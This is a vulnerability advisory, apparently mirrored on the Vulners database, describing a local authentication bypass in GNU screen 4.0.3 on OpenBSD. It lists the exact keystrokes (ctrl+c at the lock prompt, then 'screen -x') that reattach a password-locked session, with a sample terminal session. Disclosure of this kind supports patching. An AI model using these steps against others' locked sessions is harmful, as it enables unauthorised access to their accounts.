Vulners
Lucene search
screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)
_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
--------------------------------------------------------------------------------
Author: Rembrandt
Date : Known since somewhere in &cant_remember (some years, realy..)
Affected Software: screen <= 4.0.3
Affected OS : OpenBSD (any up to current (wich will become oBSD 4.4))
Type: Local
Type: Authentication Bypass
Greets go to: Helith and all affiliated/loyal people
I did not found a Advisory related to this so I decided to write a leet one.
screen is vulnerable to a authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.
It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But during the nature of the behavior of screen and OpenBSD it should be
architecture/version indipendent for now.
How to check this?
Lock screen using ctrl+x
Choose a Password
Confirm the Password
Screen asks for a Password to unlock the screen.
Just press ctrl+c and if you like screen-x to reattach the screen-session.
Example:
$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt <rembrandt>.
Password: <ctrl-c here>
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven (Attached)
25144.ttyC1.raven (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$
Because of the nature of a locked screen you wont be able to lock your shell.
screen will never ask you for a password.
Of course this works also if you get access to a SSH wich has a locked
screen running. So in case you have locked your screen session wich contains
a open SSH session to a host where you also have a locked screen session
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Importent for you should be the combination of
screen and OpenBSD.
Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.
It is known to work and I mentioned the OS.
Still it is known that it worked against some scarry Linux distributions
wich are not realy common.
All security websites wich do report this is a fake may consider to update their
reports except of simply claiming wrong things.
Have fun!
Kind regards,
Rembrandt
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Jun 2008 00:00Current
7.1High risk
Vulners AI Score7.1